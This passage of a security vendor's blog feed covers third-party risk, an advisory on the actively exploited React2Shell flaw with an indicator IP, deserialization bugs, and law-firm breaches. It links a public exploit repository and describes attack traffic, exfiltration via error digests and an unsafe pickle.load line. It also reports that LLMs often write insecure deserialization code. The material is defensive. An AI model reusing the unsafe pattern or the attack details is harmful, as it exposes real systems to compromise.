        <p><strong>The Intelligence-Led Solution:</strong> Preventing a supply chain attack means detecting subtle warning signs before the breach fully unfolds. Recorded Future’s platform continuously monitors for early indicators tied to your vendors. If threat actors known for targeting CI/CD pipelines start discussing or probing one of your software vendors, you’d know. If intelligence suggests a vendor’s code-signing certificate may be compromised, you’d get an alert. Armed with this foresight, you could elevate that vendor’s risk status, scrutinize their software updates more closely, and even hunt for indicators of compromise in your environment before the breach becomes public knowledge.</p>
        <h3>Type 2: The Widespread Third-Party Vulnerability</h3>
        <p><strong>The Scenario:</strong> A critical software vulnerability (often a zero-day) is discovered in a common component that many of your vendors use. It could be an open-source library, a popular IT tool, or a cloud service. You have no direct visibility that your suppliers rely on this component. Attackers quickly develop an exploit and start compromising organizations at scale via this flaw, long before most victims even realize they’re exposed through their third parties.</p>
        <p><strong>Real-World Example:</strong> The <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-158a">MOVEit Transfer zero-day</a> (exploited by the Cl0p ransomware group) and the <a href="https://www.cisa.gov/news-events/news/apache-log4j-vulnerability-guidance">Log4j “Log4Shell” vulnerability</a> are perfect examples of this risk. In the case of MOVEit, a single bug in a widely used file-transfer product led to the mass theft of data from thousands of companies, many of whom weren’t even direct customers of MOVEit, but their vendors were. Similarly, the Log4j flaw impacted countless businesses indirectly because software used by their contractors and providers included the vulnerable library.</p>
        <p><strong>Why Traditional Methods Fail:</strong> This is fundamentally a technology visibility problem. A point-in-time survey asking your vendors “Do you use MOVEit?” is too little, too late. By the time you send out a questionnaire and get a reply (if you get one at all), attackers may have already exploited the vulnerability and exfiltrated data. No organization can manually track every piece of software in their extended vendor ecosystem through periodic check-ins. In the MOVEit incident, many companies had no idea they were at risk until news of data breaches surfaced. Traditional vendor risk management simply isn’t designed to monitor technical exposure in real time.</p>
        <p><strong>The Intelligence-Led Solution:</strong> Defending against widespread vulnerabilities requires connecting two dots instantly: <a href="https://www.recordedfuture.com/threat-intelligence-101/risk-assessment-management/third-party-risk-assessment">what’s vulnerable and who in your supply chain is using it</a>. This is where an intelligence platform shines. Recorded Future’s approach combines technical attack surface intelligence with real-time vulnerability tracking. It continuously scans the internet to map out the external-facing tech stack of your third parties. The moment a new critical vulnerability is disclosed, <a href="https://www.recordedfuture.com/products/third-party-intelligence">Recorded Future’s intelligence</a> automatically checks which of your vendors are running that technology. You receive an immediate, prioritized alert such as: “CRITICAL: 15 of your third-party vendors are exposing servers running [the vulnerable software]. Prompt them to apply patches or mitigations immediately.”</p>
        <h3>Type 3: The Fourth-Party &amp; Concentration Risk</h3>
        <p><strong>The Scenario:</strong> Sometimes the biggest risk in your vendor ecosystem isn’t with your direct third parties, but with their key dependencies. A “fourth party” is a vendor of your vendor, and if one that many of your critical vendors rely on goes down, it can create a single point of failure. A single outage can cascade up the chain, disrupting operations even when direct vendors appear secure.</p>
        <p><strong>Real-World Example:</strong> The <a href="https://www.cisa.gov/news-events/news/kaseya-ransomware-attack-guidance-affected-msps-and-their-customers">2021 ransomware attack on Kaseya’s VSA remote monitoring and management platform</a> is a textbook case. Kaseya primarily served managed service providers (MSPs), who in turn delivered IT services to thousands of downstream customers. When attackers exploited Kaseya VSA, they were effectively able to push ransomware out through those MSPs to many organizations that had no direct relationship with Kaseya at all—they only “knew” their MSP. A single fourth-party dependency became the pivot point for a broad, multi-industry disruption.</p>
        <p><strong>Why Traditional Methods Fail:</strong> If you looked at each of your primary (third-party) vendors in isolation, they all might have passed your security reviews with flying colors. What the traditional assessment missed was that ten of those vendors all relied on the same subcontractor for a critical function, a critical audit blind spot. Most organizations only discovered their exposure to Kaseya after MSP-delivered systems were already encrypted. Without continuous visibility into your vendors’ vendors, this kind of concentration risk remains invisible until it’s too late.</p>
        <p><strong>The Intelligence-Led Solution:</strong> The only way to manage fourth-party and concentration risk is through continuous mapping of your vendors’ vendors, coupled with dynamic risk scoring. Recorded Future’s Third-Party Intelligence solution automatically identifies and maps these Nth-party relationships throughout your supply chain. In practice, this means if a critical fourth-party suffers a breach, you won’t be finding out via the news days later. Instead, your intelligence dashboard would immediately show that entity’s risk score spiking from, say, a modest 50 to a critical 99. This timely insight gives you a head start to activate business continuity and incident response plans. You immediately know exactly which of your vendors are impacted and can work to contain the fallout.</p>
        <h3>Type 4: The Vendor Credential Compromise</h3>
        <p><strong>The Scenario:</strong> Not all third-party attacks involve sophisticated malware or supply chain tampering. Sometimes hackers just log in through the front door. In this scenario, a threat actor steals valid credentials from one of your vendors and uses those to access your systems. Perhaps an employee at a smaller, “low-risk” vendor, like an HVAC contractor, falls victim to a phishing email or unknowingly runs info-stealer malware on their laptop. Their VPN login or application credentials to your network get quietly harvested and sold on the dark web. An attacker buys the login, bypasses your multi-factor authentication, and walks into your network posing as a legitimate third-party user.</p>
        <p><strong>Real-World Example:</strong> This tactic was at the heart of the high-profile <a href="https://www.bbrown.com/us/insight/a-look-back-at-the-mgm-and-caesars-incident/">2023 breaches of MGM Resorts and Caesars Entertainment</a>, where attackers initially gained access via a third-party IT support vendor’s compromised VPN credentials.</p>
        <p><strong>Why Traditional Methods Fail:</strong> A vendor security questionnaire cannot prevent an individual at a partner company from clicking a phishing link or using a weak password. Your vendor might have all the right policies on paper, but those policies are irrelevant the moment an attacker has a valid username and password in hand. Traditional TPRM programs are about vetting a vendor’s security controls and compliance, but they don’t provide real-time awareness of things like a password leak or dark web sale of access related to that vendor.</p>
        <p><strong>The Intelligence-Led Solution:</strong> The key to stopping a credential-based breach is catching those compromised credentials before they are used against you. This calls for continuous identity-centric intelligence. Recorded Future’s Third-Party Intelligence module includes automated monitoring of a wide range of sources, from dark web forums to infostealer logs and criminal marketplaces, specifically watching for any mention of your organization’s partners and their accounts. The moment a set of credentials associated with one of your vendors appears in an illicit context, you receive a high-priority alert. Your team can immediately revoke or reset that vendor account and investigate the extent of access. This is the definition of proactive defense: you’re effectively shutting the door on the attacker before they can walk through it.</p>
        <h3>Type 5: The Operational &amp; Financial Instability Risk</h3>
        <p><strong>The Scenario:</strong> Sometimes the greatest third-party risk is a vendor’s operational or financial collapse. Consider a scenario where a critical vendor suddenly encounters a non-cyber crisis like bankruptcy, a major lawsuit or regulatory sanction, a natural disaster, or even a geopolitical event that halts their business. From your security team’s perspective everything looked fine, but virtually overnight this partner’s failure threatens to grind your business to a halt.</p>
        <p><strong>Real-World Example:</strong> A headline-grabbing case occurred with the <a href="https://www.law.uw.edu/news-events/news/2023/svb-collapse">sudden collapse of Silicon Valley Bank (SVB)</a> in March 2023. SVB wasn’t attacked by hackers; it suffered a bank run and shut down in a matter of days. Companies that used SVB as a banking partner or for credit found themselves unable to access funds or process payroll, creating a cascade of operational and financial issues.</p>
        <p><strong>Why Traditional Methods Fail:</strong> A standard security questionnaire or compliance-focused vendor review is utterly blind to this category of risk. Your CISO’s third-party risk process likely doesn’t include reviewing a vendor’s financial statements or monitoring news about their executives’ legal troubles—nor should it, in a traditional model, since those are outside the classic IT security scope. As a result, organizations were caught off-guard by SVB’s collapse. A vendor that looked perfectly green from a security control standpoint turned out to be a huge business continuity threat. This kind of event exposes an “edge case” risk that isn’t an edge case at all: vendors can introduce strategic and financial risks that security teams and vendor managers often aren’t tracking.</p>
        <p><strong>The Intelligence-Led Solution:</strong> Truly comprehensive third-party risk management means monitoring all-source intelligence on your vendors, not just cyber indicators. Recorded Future’s Third-Party Intelligence platform is built to ingest and analyze a broad spectrum of data about companies. This includes real-time monitoring of global news media, credit ratings and financial filings, changes in executive leadership, legal filings, sanctions lists, regulatory watchlists, and more. By defining “risk” holistically, the platform can alert you to significant non-cyber events that may impact your vendors. These signals give your security, risk, and procurement teams time to react, whether that means activating contingency plans, finding alternate suppliers, or engaging leadership to address the issue.</p>
        <h2>The Solution: Move from “Trust” to “Continuous Verification”</h2>
        <p>The five examples share a theme: “trust” is not a control. Vendor attestations and annual audits don’t capture rapidly changing third-party conditions—exploits, credentials, dependencies, and financial shocks. To answer why third-party risk management is important: it’s no longer a “vendor” problem. It’s your attack surface, your data, and your reputation on the line.</p>
        <p>This is why security leaders are shifting from a trust-but-verify model to a <a href="https://www.recordedfuture.com/threat-intelligence-101/risk-assessment-management/vendor-risk-management-framework">model of continuous verification</a>, replacing blind trust with live intelligence.</p>
        <p>Moving to continuous verification means supplementing or replacing periodic vendor check-ins with real-time intelligence and automation. This is where Recorded Future’s approach comes in. Recorded Future acts as a “risk radar” that’s always on, giving you a 360-degree, real-time view of your third-party ecosystem. It uniquely integrates multiple intelligence streams—threat intelligence, attack surface intelligence, and third-party risk intelligence—into one platform.</p>
        <ul>
          <li>Know which CVEs matter today across your ecosystem with <a href="https://www.recordedfuture.com/products/vulnerability-intelligence">Vulnerability Intelligence</a> and exploit-in-the-wild context.</li>
          <li>Detect compromised vendor access with <a href="https://www.recordedfuture.com/products/identity-intelligence">Identity Intelligence</a> and automated revocation workflows.</li>
          <li>Map fourth-party dependencies and track concentration with <a href="https://www.recordedfuture.com/products/third-party-intelligence">Third-Party Intelligence</a> risk scoring.</li>
          <li>Operationalize all of this via integrations to SIEM/SOAR/EDR and GRC/TPRM workflows (<a href="https://www.recordedfuture.com/blog/servicenow-third-party-risk">e.g., ServiceNow</a>) so that risk evidence triggers action.</li>
        </ul>
        <p>Recorded Future is the only platform connecting disparate, live third-party intelligence into a single, real-time view that answers the question:</p>
        <p><em><strong>“Which of my vendors poses the greatest risk to my business—right now?”</strong></em></p>
        <p>Ready to replace point-in-time vendor questionnaires with continuous verification? Schedule a <a href="https://www.recordedfuture.com/get-started#book-demo">personalized demo</a>, and our experts will show you how the Recorded Future platform provides a complete, real-time picture of your vendor ecosystem.</p>
        <div>
          <div>
            <div>
              <h2>FAQ</h2>
            </div>
          </div>
          <div>
            <div>
              <h3>What is the first step in creating a third-party risk management (TPRM) program?</h3>
              <p>The first step is inventory and categorization. You can't protect what you don't know you have. This involves creating a comprehensive inventory of all your third-party vendors, suppliers, and partners and then categorizing them based on their access to sensitive data and their criticality to your operations (e.g., "high," "medium," "low" risk).</p>
            </div>
          </div>
          <div>
            <div>
              <h3>What is the difference between third-party and fourth-party risk?</h3>
              <p>Third-party risk is the risk posed by your direct vendors (e.g., your SaaS provider, your payroll company). Fourth-party risk (or Nth-party risk) is the risk posed by your vendor's vendors. For example, if your SaaS provider hosts its application on a major cloud platform, that cloud platform is your fourth-party. The risk is cascaded up the supply chain and is often invisible to you without the right intelligence.</p>
            </div>
          </div>
          <div>
            <div>
              <h3>How often should we assess our third-party vendors?</h3>
              <p>High-risk vendors (those with access to critical data or vital to operations) should be assessed at least annually and continuously monitored in real-time. Traditional, "point-in-time" assessments (like questionnaires) are no longer sufficient, as a vendor's security posture can change overnight.</p>
            </div>
          </div>
          <div>
            <div>
              <h3>How does Recorded Future help manage third-party risk more effectively?</h3>
              <p>Recorded Future's Third-Party Intelligence solution moves organizations beyond static, periodic assessments. It provides continuous, real-time intelligence by monitoring all your vendors for critical risk signals—like data breaches, malware infections, exposed credentials, attack surface vulnerabilities, and negative financial news—allowing you to prioritize and act on the most critical vendor risks before they become a breach.</p>
            </div>
          </div>
          <div>
            <div>
              <h3>How can I see risks from my vendors that are part of my own attack surface?</h3>
              <p>This is a critical connection. Recorded Future's Attack Surface Intelligence can be combined with Third-Party Intelligence to identify external-facing assets and vulnerabilities (e.g., services, open ports, vulnerable software) that belong to your third parties but are directly linked to your organization. This helps you understand exactly how a vendor's poor security hygiene directly exposes your own attack surface to an attacker.</p>
            </div>
          </div>
        </div>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_1f932dac2f38bc9bc9592fb26c835aa00e1fe1df1.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[When the Digital World Turns Physical: The Expanding Role of Threat Intelligence in Executive Protection]]></title>
            <link>https://www.recordedfuture.com/blog/digital-world-turns-physical-expanding-role-threat-intelligence-executive-protection</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/digital-world-turns-physical-expanding-role-threat-intelligence-executive-protection</guid>
            <pubDate>Mon, 08 Dec 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[Discover how converged threat intelligence protects executives from deepfakes, doxxing, and cyber-enabled physical threats with Recorded Future.]]></description>
            <content:encoded><![CDATA[
        <div>
          <div>
            <div>
              <h2>Key Takeaways</h2>
              <ul>
                <li><strong>Cyber and physical risks are converging.</strong> Online exposure now translates into real-world danger as doxxing, deepfakes, and business email compromise blur the boundary between the virtual and physical worlds.</li>
                <li><strong>Executives are prime targets.</strong> Their digital footprints, public visibility, and access to sensitive assets make them especially attractive to adversaries.</li>
              </ul>
              <ul>
                <li><strong>Threat intelligence can bridge the gap.</strong> Organizations are using social media monitoring, geopolitical analysis, and risk scoring to identify early indicators of harm against executives and employees.</li>
              </ul>
              <ul>
                <li><strong>Recorded Future enables proactive protection.</strong> By unifying physical and digital intelligence, security teams can detect threats earlier, contextualize risk, and safeguard leadership.</li>
              </ul>
            </div>
          </div>
        </div>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_12954aecdae677b3bfd16a2b689442a79b95f4b83.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Critical React2Shell Vulnerability Under Active Exploitation by Chinese Threat Actors]]></title>
            <link>https://www.recordedfuture.com/blog/critical-react2shell-vulnerability</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/critical-react2shell-vulnerability</guid>
            <pubDate>Mon, 08 Dec 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[A critical vulnerability in React Server Components is allegedly being actively exploited by multiple Chinese threat actors, Recorded Future recommends organizations patch their systems immediately.]]></description>
            <content:encoded><![CDATA[
        <p><em>Last updated on 9 December.</em></p>
        <p>A critical vulnerability in React Server Components is <a href="https://aws.amazon.com/blogs/security/china-nexus-cyber-threat-groups-rapidly-exploit-react2shell-vulnerability-cve-2025-55182/">allegedly</a> being actively exploited by multiple Chinese threat actors, Recorded Future recommends organizations patch their systems immediately.</p>
        <h2>What's Happening</h2>
        <p>CVE-2025-55182, dubbed "React2Shell," affects React Server Components versions 19.0, 19.1.0, 19.1.1, and 19.2.0 in several Meta packages. Amazon's AWS Threat Intelligence team <a href="https://aws.amazon.com/blogs/security/china-nexus-cyber-threat-groups-rapidly-exploit-react2shell-vulnerability-cve-2025-55182/">reported</a> on December 4 that Chinese threat groups including Earth Lamia, Jackpot Panda, and several untracked clusters are actively exploiting this vulnerability. However, AWS has not provided any further evidence for these attributions beyond IP addresses allegedly used by these threat groups. At this stage, Insikt Group cannot exclude the possibility that the same threat group might still be using the IP address 206[.]237[.]3[.]150, but we are currently unable to verify AWS’s attribution to Earth Lamia.</p>
        <p>The vulnerability stems from unsafe payload deserialization at React Server Function endpoints. When successfully exploited, attackers can execute arbitrary code through crafted HTTP requests, potentially leading to complete backend compromise.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1021bb5d52f4fce917b3b7c3ca8650cd07312bfbd.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="780" />
            </div>
          </div>
          <div>
            <div>CVE-2025-55182 (React2Shell) Intelligence Card®</div>
          </div>
        </div>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_1abb944bea932ffe338341ee3bf2fc57346f3d3e6.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[The Bug That Won't Die: 10 Years of the Same Mistake]]></title>
            <link>https://www.recordedfuture.com/blog/the-bug-that-wont-die</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/the-bug-that-wont-die</guid>
            <pubDate>Fri, 05 Dec 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[Explore a decade of deserialization vulnerabilities, from Java to React/Next.js CVEs, and learn how to harden apps and stay ahead with Recorded Future.]]></description>
            <content:encoded><![CDATA[
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1345859127d4d819a6a3d672446d3c9dafda9cb3e.jpg?width=750&amp;format=jpg&amp;optimize=medium" width="1456" height="840" />
            </div>
          </div>
          <div>
            <div>CVE-2025-55182 Intelligence Card c/o Recorded Future</div>
          </div>
        </div>
        <p>There are now multiple publicly available exploit scripts (I forked one on GitHub <a href="https://github.com/levi-gundert/NextRce_RSC_Exploit">here</a>) for the React and Next.js vulnerabilities (CVE-2025-55182 and CVE-2025-66478).</p>
        <p>The underlying issue is data serialization/deserialization, which evoked thoughts about a <a href="https://www.recordedfuture.com/blog/vulnerability-risk-analysis">blog I wrote in 2016</a>, addressing the same issue (at the time, the topic was <a href="https://nvd.nist.gov/vuln/detail/cve-2015-4852">CVE-2015-4852</a>, a serialization flaw in Java objects that affected Oracle and Apache products).</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_101630a2c5acdcea738bbe18fd066cb912bb9450e.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="818" />
            </div>
          </div>
          <div>
            <div>Timeline illustrating the deserialization vulnerability impacts of 40+ critical CVEs across 6 ecosystems, over the course of 10 years.</div>
          </div>
        </div>
        <h2>2 Risk Takeaways</h2>
        <ul>
          <li><strong>The exploit pattern repeats because serialization is a straightforward method for transferring data, and developers typically use what works.</strong> Coders use different languages and frameworks, yet the same class of vulnerability persists. The upstream opportunity here is for universities to aggressively drive security into all programming courses.</li>
          <li><strong>Everyone is a coder now, and security domain expertise has never been more important.</strong> Every business function will include AI-assisted coders, supercharging productivity and efficiency. LLMs don’t need to stop for human input, but understanding internet plumbing, tools, platforms, and security implications is now crucial. <strong>The most valuable employees can use AI for 10x+ impact AND catch potential issues as humans become the AI-copilots.</strong></li>
        </ul>
        <h2>Technical Causation</h2>
        <ul>
          <li><strong>Serialization is seductive:</strong> It’s the easy path for passing complex objects across trust boundaries (client ↔ server, service ↔ service). Developers reach for it because it “just works” (until it catastrophically doesn’t).</li>
          <li><strong>Framework abstraction hides the danger:</strong> Some percentage of Next.js developers using Server Actions are unaware that they’re invoking a custom serialization protocol. They’re calling a function. The risk is invisible until it’s exploited.</li>
          <li><strong>The ecosystem never learns collectively:</strong> Java shops learned (painfully) about gadget chains and ObjectInputStream. However, that institutional knowledge didn’t necessarily transfer to Node.js/React developers building RSC implementations a decade later.</li>
        </ul>
        <h2>The Threat</h2>
        <p>The attack surface has expanded once again. In 2015, we were tracking exploit chatter on Chinese forums appearing weeks before CVEs. Now, there are double-digit public <a href="https://www.recordedfuture.com/research/flying-under-the-radar-abusing-github-malicious-infrastructure">GitHub repositories with weaponized exploit code</a> within days of disclosure. Agentic workflows will soon compress that window down to minutes. T<strong>he time-to-exploitation will amount to the time defenders spend reading about any new high-severity vulnerability.</strong></p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_14a029e0e8e1f36af8ac10d11c0c801eb108316fa.jpg?width=750&amp;format=jpg&amp;optimize=medium" width="1068" height="576" />
            </div>
          </div>
          <div>
            <div>PoC exploit testing, c/o Recorded Future</div>
          </div>
        </div>
        <h2>Defender Considerations for CVE-2025-55182 / CVE-2025-66478</h2>
        <ul>
          <li>Attackers differentiate vulnerable App Router targets from safe Pages Router sites by checking for window.__next_f vs __NEXT_DATA__. <strong>Your asset inventory should already know which flavor you’re running.</strong></li>
          <li>The vulnerability lives in the Flight protocol deserialization. If you’re not using Server Actions, <strong>consider disabling them</strong>. If you are, the endpoint (Next-Action header targets) is where to focus <strong>WAF rules</strong>.</li>
          <li><strong>Hunt</strong> for anomalous <strong>POST requests</strong> with Next-Action headers containing malicious multipart payloads targeting __proto__ or unusual serialized JSON structures. The exploit <strong>exfils via base64 in error digests</strong>.</li>
          <li>The core issue is in react-server-dom-webpack, react-server-dom-parcel, and react-server-dom-turbopack. Custom RSC implementations outside Next.js are equally exposed.</li>
          <li>RCE means immediate credential harvesting from environment variables, lateral movement via cloud metadata endpoints, and persistence via scheduled tasks or cron jobs. IR playbooks should assume full compromise.</li>
        </ul>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_16de4644ba5695754c2eba12bf20b95a04da6e827.jpg?width=750&amp;format=jpg&amp;optimize=medium" width="1456" height="794" />
            </div>
          </div>
          <div>
            <div>AI-generated serialization vulnerability audit</div>
          </div>
        </div>
        <h2>For “Vibe Coders”: A Conversation with Claude Opus 4.5</h2>
        <p><strong>Q:</strong> What’s a proper input validation methodology for deserializing data to avoid security failures?</p>
        <p><strong>A:</strong> Native serialization formats (Java ObjectInputStream, PHP unserialize, Python pickle, .NET BinaryFormatter) reconstruct objects with behavior, which means arbitrary code can execute during deserialization. The fix is using formats that only transfer data, not executable structures.</p>
        <p><strong>Safe alternatives:</strong></p>
        <p><strong>1. Data-only interchange formats</strong></p>
        <ul>
          <li>JSON (most common)</li>
          <li>Protocol Buffers (Google)</li>
          <li>FlatBuffers (zero-copy, fast)</li>
          <li>MessagePack (binary JSON, compact)</li>
          <li>CBOR (binary, IETF standard)</li>
        </ul>
        <p>These parse into primitive types and structures—no object instantiation, no code execution.</p>
        <p><strong>2. Schema validation on top</strong></p>
        <ul>
          <li>JSON Schema</li>
          <li>Zod / Yup (JavaScript)</li>
          <li>Pydantic (Python)</li>
          <li>marshmallow (Python)</li>
        </ul>
        <p>Define exactly what shape the data must have. Reject anything that doesn’t match before your application logic ever sees it.</p>
        <p><strong>3. When you need objects, build them explicitly</strong></p>
        <p>Instead of:</p>
        <p>obj = pickle.load(untrusted_data) # dangerous</p>
        <p>Do:</p>
        <p>data = json.loads(untrusted_data) # safe parse<br />obj = MyClass(**validated_schema(data)) # explicit construction</p>
        <p><strong>4. For config/markup</strong></p>
        <ul>
          <li>TOML instead of YAML (no code execution tags)</li>
          <li>JSON5 for human-readable config</li>
          <li>Avoid YAML’s !!python/object or Ruby’s !ruby/object—or use safe loaders exclusively (yaml.safe_load())</li>
        </ul>
        <p><strong>The one-liner:</strong> If your serialization format can reconstruct arbitrary types, it’s a vulnerability. Stick to dumb data formats + explicit object construction.</p>
        <p><strong>Q:</strong> Do modern LLMs know how to securely validate data by default?<br /><strong>A:</strong> Technically, yes, practically, it’s complicated.</p>
        <p><strong>What’s in the training data:</strong></p>
        <ul>
          <li>Security research, CVE databases, OWASP guidance</li>
          <li>Countless blog posts about pickle/unserialize dangers</li>
          <li>Secure coding documentation from every major vendor</li>
        </ul>
        <p>So if you ask directly—”Is pickle safe for untrusted data?”—any decent LLM will say no.</p>
        <p><strong>The problem:</strong></p>
        <p>LLMs are also trained on millions of Stack Overflow answers, tutorials, and GitHub repos that use pickle.load(), unserialize(), and yaml.load() because they’re convenient. When someone asks, “How do I save this object to a file and load it later?” the pattern-match often lands on the dangerous-but-common approach.</p>
        <p><strong>What I’ve observed:</strong></p>
        <ul>
          <li>Ask for “the fastest way” → often gets insecure code</li>
          <li>Ask for “production-ready” or “secure” → better results</li>
          <li>Ask without security context → coin flip</li>
        </ul>
        <p><strong>The real gap:</strong></p>
        <p><strong>LLMs don’t reason about security</strong>—they predict likely tokens based on training. They won’t spontaneously say “wait, where is this data coming from?” the way an experienced developer might. The threat model isn’t automatic.</p>
        <p><strong>Practical advice for developers using LLM assistants:</strong></p>
        <ul>
          <li>Explicitly ask for secure alternatives</li>
          <li>Ask “What are the security implications of this code?”</li>
          <li>Treat generated code like untrusted input—review it</li>
        </ul>
        <p>So yes, the knowledge is in there. But so is a decade of insecure examples, and the LLM doesn’t inherently prioritize one over the other unless prompted.</p>
        <h2>Stay Ahead with Recorded Future</h2>
        <p>Learn how <a href="https://www.recordedfuture.com/products/vulnerability-intelligence">Recorded Future's Vulnerability Intelligence</a> tracks CVE disclosures, monitors exploit availability across GitHub and underground forums, and prioritizes vulnerabilities based on active threats to your environment. The platform compresses your response window from days to hours.</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_1af7c44d6aee80d9b7e4e6531730c98557961f925.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[The Hidden Cascade: Why Law Firm Breaches Destroy More than Data]]></title>
            <link>https://www.recordedfuture.com/blog/the-hidden-cascade</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/the-hidden-cascade</guid>
            <pubDate>Fri, 05 Dec 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[Discover how law firm breaches expose decades of M&A intelligence, client data, and privileged strategy—and how to reduce cascading vendor risk before it hits.]]></description>
            <content:encoded><![CDATA[
        <p>In the wake of the <a href="https://communities.gainsight.com/community-news-2/salesforce-gainsight-connected-app-incident-faqs-29809">Salesforce/Gainsight breach</a> (kudos to Salesforce for transparently sharing indicators of compromise and updated progress on remediation), third-party cyber and exposure risk is <a href="https://www.csoonline.com/article/4009360/cybersecurity-in-the-supply-chain-strategies-for-managing-fourth-party-risks.html">top of mind for many CISOs</a>. <strong>Professional services firms</strong> are often overlooked in this context, with disastrous consequences.</p>
        <p><strong>Law firms</strong>, specifically, are particularly vulnerable to creating downstream <a href="https://intelligence2risk.substack.com/p/five-risk-categories">risk impacts</a> given the nature and purpose of legal services, and adversary targeting is on the rise.</p>
        <h2>The Industrial Consolidation of Legal Sector Attacks</h2>
        <p>The numbers paint a stark reality. <a href="https://programs.com/resources/law-firm-cyberattack-statistics/">Twenty % of US law firms were targeted by cyberattacks in the past year</a>, with 56% of breached firms losing sensitive client information. The <a href="https://integrisit.com/law-firm-cybersecurity-2025-report/">average breach cost</a> reached $5.08 million, representing a 10% year-over-year increase that excludes long-term reputational damage and client defection.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_11255b32c0909cfc64c893556a30ca5222f994545.jpg?width=750&amp;format=jpg&amp;optimize=medium" width="1456" height="462" />
            </div>
          </div>
          <div>
            <div><em><a href="https://www.recordedfuture.com/platform/recorded-future-ai">Recorded Future’s AI</a></em> <em>Insights from 2025 service industry victims</em></div>
          </div>
        </div>
        <p>RansomHub has emerged as 2025’s dominant threat after absorbing talent from disrupted groups like <a href="https://therecord.media/ransomware-gang-takedown-proliferation">LockBit and ALPHV/BlackCat</a>. By <a href="https://www.bipc.com/ransomware-2025-the-digital-hydra">offering affiliates a 90/10 profit split</a> versus the standard 70/30, they’ve attracted the most capable operators in the underground economy. <a href="https://therecord.media/synnovis-healthcare-data-breach-notification-uk-patients">Qilin’s Rust-based ransomware</a> has specifically targeted legal entities with encryption-resistant payloads, making recovery nearly impossible.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1216cbfda60713263188df796c9f54d686737a8ec.jpg?width=750&amp;format=jpg&amp;optimize=medium" width="1302" height="1600" />
            </div>
          </div>
          <div>
            <div><em>Qilin ransomware profile c/o Recorded Future</em></div>
          </div>
        </div>
        <p>The chart below, derived from Recorded Future analyst notes tracking ransomware extortion sites, illustrates the growth in ransomware targeting by industry, with legal firms remaining the number one target.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1ceb881a04df23ca9b7f03db7b4650d81b8325472.png?width=750&amp;format=png&amp;optimize=medium" width="1456" height="1201" />
            </div>
          </div>
          <div>
            <div><em>Ransomware victims industry comparison in 2024 and 2025.</em></div>
          </div>
        </div>
        <p>These aren’t opportunistic attacks. Threat actors now maintain “dwell times” exceeding weeks inside firm networks, systematically identifying crown jewel intelligence before triggering extortion events. Industrialization means attackers understand exactly what creates maximum leverage: M&amp;A intelligence during active deals, litigation strategies before trial, and decades of retained client data across multiple matters.</p>
        <p>Recorded Future telemetry from the past quarter indicates that over 20 observed legal or legally adjacent firms have malware communicating with malicious command-and-control (C2) servers. While the observed traffic was 24 hours or less for some firms, other organizations saw persistence above 5 days. Certainly, a malicious implant does not equate to a full breach and exfiltration of client-sensitive data; however, it is a valuable signal to monitor for changes in third-party and fourth-party risk.</p>
        <div>
          <div>
            <div>rxkipoqeu6</div>
          </div>
        </div>
        <p><em>Infographic depicting recent malware dwell times in global legal firm victims</em></p>
        <h2>When Privilege Becomes Your Adversary’s Weapon</h2>
        <p>Courts have systematically eroded attorney-client privilege protection for breach investigations, creating a dangerous trap where forensic reports become ammunition for adversaries. The <a href="https://www.hklaw.com/-/media/files/news/2020/06/after-capital-one-ruling-how-will-companies-protect-forensic-reports.pdf?la=en">Capital One decision</a> ordered production of Mandiant’s forensic report because the investigator served “business purposes” rather than pure legal advice.</p>
        <p>The cascade accelerates through “sword and shield” waiver doctrine. Any use of breach investigation findings, even citing them in discovery responses, can trigger a subject matter waiver, requiring disclosure of all privileged communications related to threat assessment and remediation strategy. The <a href="https://www.govinfo.gov/app/details/USCOURTS-njd-1_23-md-03055/context">2024 Samsung Data Breach ruling</a> made this explicit: sharing reports with 15 executives indicated business decision-making use, defeating privilege.</p>
        <p>Federal Rule of Evidence 502 creates additional exposure when companies share incident reports with regulators. <a href="https://www.reuters.com/legal/law-firm-covington-ordered-identify-some-clients-us-sec-probe-2023-07-24/">The 2023 Covington &amp; Burling case</a> saw the SEC subpoena the firm for names of 298 publicly-traded clients whose data “may have been exfiltrated,” though a court eventually ruled that only seven clients had to be named, it did establish that law firms cannot completely shield client identity from regulators, and those clients could then face SEC investigation for failure to disclose their counsel was breached.</p>
        <h2>M&amp;A Intelligence Monetization at Scale</h2>
